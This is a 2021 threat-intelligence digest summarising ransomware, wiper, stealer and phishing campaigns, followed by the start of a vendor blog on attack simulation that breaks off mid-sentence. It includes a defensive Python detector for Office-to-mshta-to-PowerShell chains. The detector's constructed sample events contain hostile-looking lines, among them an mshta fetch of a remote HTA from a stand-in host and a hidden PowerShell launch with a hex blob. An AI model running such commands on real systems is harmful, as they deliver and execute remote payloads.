🚨An attack on the Iranian Railways 🚨News
Systems of Iranian Railways and the Ministry of Roads and Urban Development became the subject of targeted cyber attacks. The attacks relied heavily on the attackers' prior knowledge and reconnaissance of the targeted networks. They were found to be tactically and technically similar to previous activity against multiple private companies in Syria that had been carried out since at least 2019. Analysts were able to tie this activity to a threat group that identifies itself as a regime opposition group, named Indra. During these years, the attackers developed and deployed within victims' networks at least three different versions of a wiper, dubbed Meteor, Stardust, and Comet. Judging by the quality of the tools, their modus operandi, and their presence on social media, analysts find it unlikely that Indra is operated by a nation-state actor.
🚨A New Phishing Campaign Discovered 🚨News
Anomali Threat Research discovered a spearphishing campaign that appears to have begun in early July 2021, targeting the manufacturing industry throughout Asia. The tactics, techniques, and procedures (TTPs) identified in this campaign align with the Aggah threat group. The analysis found multiple PowerPoint files containing malicious macros that used MSHTA to execute a script which in turn used PowerShell to load hex-encoded payloads. Based on the TTPs of this campaign, Anomali assesses with moderate confidence that the actor is Aggah.
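The chain described above (Office document, then mshta.exe, then PowerShell carrying a hex-encoded payload) is a useful thing to hunt for in endpoint process-creation telemetry. The following detection logic is an added example written for this digest; it is not Anomali's code and not taken from the campaign analysis. It walks a parent/child process tree and flags PowerShell processes spawned by mshta.exe, raising the severity when the grandparent is an Office application and the command line carries a long run of hex. The event records and the field names (`pid`, `ppid`, `image`, `cmd`) are constructed here for illustration; map them onto whatever your EDR or Sysmon pipeline emits.

```python
import re

# Office binaries that should not normally be the origin of an mshta -> powershell chain
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}

# 64 or more contiguous hex characters (32+ byte pairs): a hex-encoded payload on the command line
HEX_BLOB = re.compile(r"(?:[0-9A-Fa-f]{2}){32,}")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path ("C:\\x\\mshta.exe" -> "mshta.exe")."""
    return path.rsplit("\\", 1)[-1].lower()


def find_suspicious_chains(events: list[dict]) -> list[dict]:
    """Return one finding per powershell.exe whose parent is mshta.exe.

    Each event is a dict with keys pid, ppid, image, cmd (constructed schema).
    Severity is "high" when the chain starts in an Office app and the PowerShell
    command line carries a hex blob, otherwise "medium".
    """
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if basename(e["image"]) != "powershell.exe":
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or basename(parent["image"]) != "mshta.exe":
            continue
        grandparent = by_pid.get(parent["ppid"])
        office_origin = grandparent is not None and basename(grandparent["image"]) in OFFICE_APPS
        hex_payload = HEX_BLOB.search(e["cmd"]) is not None
        findings.append({
            "pid": e["pid"],
            "office_origin": office_origin,
            "hex_payload": hex_payload,
            "severity": "high" if (office_origin and hex_payload) else "medium",
        })
    return findings


# Constructed sample process-creation events (not real telemetry). The hex blob is a
# meaningless repeated marker, present only so the regex has something to match.
SAMPLE_EVENTS = [
    {"pid": 3200, "ppid": 900,
     "image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\POWERPNT.EXE",
     "cmd": "POWERPNT.EXE invoice.pptm"},
    {"pid": 4100, "ppid": 3200,
     "image": "C:\\Windows\\System32\\mshta.exe",
     "cmd": "mshta.exe http://example.invalid/stage.hta"},
    {"pid": 4188, "ppid": 4100,
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmd": "powershell.exe -w hidden -c \"$h='" + "DEADBEEF" * 9 + "'\""},
    {"pid": 5000, "ppid": 3200,
     "image": "C:\\Windows\\System32\\notepad.exe",
     "cmd": "notepad.exe"},
    {"pid": 6000, "ppid": 900,
     "image": "C:\\Windows\\System32\\mshta.exe",
     "cmd": "mshta.exe C:\\Users\\u\\legacy-tool.hta"},
    {"pid": 6010, "ppid": 6000,
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmd": "powershell.exe -nop -c Get-Date"},
    {"pid": 5100, "ppid": 900,
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmd": "powershell.exe Get-Process"},
]


if __name__ == "__main__":
    for f in find_suspicious_chains(SAMPLE_EVENTS):
        print(f)
```

Run against the constructed events, the function reports the Office-originated chain (pid 4188) as high severity and the explorer-originated mshta/PowerShell pair (pid 6010) as medium; the PowerShell started directly by explorer and the notepad child of PowerPoint produce no finding. In production the medium tier is where legitimate HTA-based tooling shows up, so tune it against your own baseline before alerting on it.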
🚨Magniber ransomware is back🚨News
Magniber ransomware makes a comeback using the same methods as before: exploiting unpatched vulnerabilities on South Korean victims. In July 2021, analysts identified Magniber ransomware attempting to use the known PrintNightmare vulnerability to compromise victims. When the PrintNightmare (CVE-2021-34527) vulnerability was disclosed, analysts assessed that it would likely be used by threat actors, as it allowed for possible remote code execution (RCE) and local privilege escalation (LPE). This assessment proved accurate in light of the recent events.
🚨A new variant of the eCh0raix ransomware 🚨News
A new variant of eCh0raix ransomware is targeting Synology network-attached storage (NAS) and Quality Network Appliance Provider (QNAP) NAS devices. Attackers are also leveraging CVE-2021-28799 to deliver the new eCh0raix ransomware variant to QNAP devices. While eCh0raix is a known ransomware family that has historically targeted QNAP and Synology NAS devices in separate campaigns, this new variant is the first time analysts have seen it combine functionality to target both QNAP and Synology NAS devices, demonstrating that some ransomware developers continue to invest in optimizing the tools used against devices common in small office and home office (SOHO) environments.
🚨A Vulnerability Alert 🚨News
Juniper Threat Labs continuously monitors in-the-wild network traffic for malicious activity. Recently, they discovered active exploitation of a vulnerability that had been disclosed only days earlier. CVE-2021-20090 is a vulnerability that was discovered by Tenable and made public. According to Tenable's research, it potentially affects millions of home routers (and other IoT devices using the same vulnerable code base) manufactured by no fewer than 17 vendors, including some ISPs. The common thread between these devices appears to be firmware from Arcadyan.
🚨Raccoon - a new info-stealer malware🚨News
Advertised as a 'Malware-as-a-Service' (MaaS) threat on various cybercriminal forums, Raccoon is an information stealer targeting victim credentials and cryptocurrency wallets. Seemingly favored by some threat actors due to its simplicity, the malware component of Raccoon omits advanced features, such as those used to evade detection, and instead focuses on the 'stealer' task at hand. While this approach requires those deploying the threat to use third-party tools for evasion, such as cryptors or packers to thwart signature-based detection, the ongoing popularity and apparent success of Raccoon suggests that this has not been a problem for many. Lacking its own distribution method, recently observed Raccoon incidents appear to begin with the delivery of malicious document attachments sent via an indiscriminate unsolicited email (malspam) campaign. It is also reported that Raccoon has been dropped by third-party exploit kits and other malware families.
🚨 Solarmarker malware targets Healthcare and education sectors 🚨News
The healthcare and education sectors are the frequent targets of a new surge in credential harvesting activity from a "highly modular" .NET-based information stealer and keylogger, charting the course for the threat actor's continued evolution while simultaneously remaining under the radar. Dubbed "Solarmarker," the malware campaign is believed to have been active since September 2020, with telemetry data pointing to malicious actions as early as April 2020, according to Cisco Talos. "At its core, the Solarmarker campaign appears to be conducted by a fairly sophisticated actor largely focused on credential and residual information theft," Talos researchers Andrew Windsor and Chris Neal said in a published technical write-up.
🚨 MountLocker ransomware new tactics 🚨
The MountLocker ransomware operation now uses enterprise Windows Active Directory APIs to worm through networks. MountLocker started operating in July 2020 as a Ransomware-as-a-Service (RaaS) in which the developers are in charge of programming the ransomware and the payment site, while affiliates are recruited to break into businesses and encrypt their devices. Under this arrangement, the MountLocker core team receives a smaller cut of 20-30% of a ransom payment, and the affiliate keeps the rest.
🚨 A new remote access trojan - ReverseRat🚨
Lumen's Black Lotus Labs detected a new remote access trojan, ReverseRat. Based on Lumen's global telemetry and analysis, the actor is targeting government and energy organizations in the South and Central Asia regions, with operational infrastructure hosted in Pakistan. ReverseRat was deployed in parallel with an open-source RAT called AllaKore to infect machines and achieve persistence.
🚨 A new variant of the downloader JSSLoader was spotted 🚨
Proofpoint researchers observed a new variant of the downloader JSSLoader in several campaigns impacting a variety of organizations. This version of the malware loader was rewritten from .NET to the C++ programming language. This change, while not unheard of, is not a common occurrence and could be an effort by the threat actors utilizing JSSLoader to evade current detections. JSSLoader is often dropped in the first or second stage of a campaign and has the functionality to profile infected machines and load additional payloads.
Setting the Record Straight on Breach & Attack Simulation, Purple Teaming and Continuous Security Validation
As a twenty-plus year cybersecurity professional I can count on a single hand the times I had to respond to a vendor who made crazy, unsubstantiated claims. As a practitioner in Breach and Attack Simulation (BAS) and Purple Teaming, I wanted to counter some really misleading "marketecture" that I heard another vendor make. I am going to take the high road and not call that vendor out by name, and set the record straight by giving my experience with specifically the Cymulate Continuous Security Validation Platform that includes BAS and Purple Teaming solutions.
What is Cymulate Breach and Attack Simulation?
BAS is using real-world exploits and techniques along the entire kill chain to test enterprise environments' real security controls, environments, and people. By doing so you get the most accurate picture of how the enterprise would respond to a real attack. Starting with reconnaissance, these solutions move on to mail, web, application reverse proxying and spear phishing techniques. Th